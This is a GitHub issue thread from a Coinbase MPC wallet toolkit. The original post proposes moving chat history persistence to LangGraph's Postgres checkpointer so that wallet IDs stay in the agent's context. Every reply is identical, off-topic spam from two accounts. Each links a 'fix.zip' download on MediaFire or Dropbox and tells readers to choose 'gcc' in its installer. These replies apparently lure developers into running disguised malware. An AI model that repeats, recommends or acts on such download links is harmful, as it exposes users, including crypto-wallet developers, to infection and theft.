### ISSUE TITLE
Use Postgres Checkpointer for Persistance

### ISSUE THREAD

**Issue by mikeghen** [mikeghen/coinbase-mpc-toolkit#4]
This method is preferred over using the custom code I write the uses Flask-SQLAlchemy. Read about it here: https://langchain-ai.github.io/langgraph/how-tos/persistence_postgres/#with-a-connection

The primary issue with the existing chats is:
1. The history is not stored optimially for langchain agents to use. I just put something simple together but the method they use to encode chat history is better.
2. The wallet **ID** (not address) gets lost from the context and it fails to send correctly. Coinbase MPC requires the "wallet ID" not the wallet address is used. I think switching to the langgraph method using their Postgres Checkpointer will fix this issue as well.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
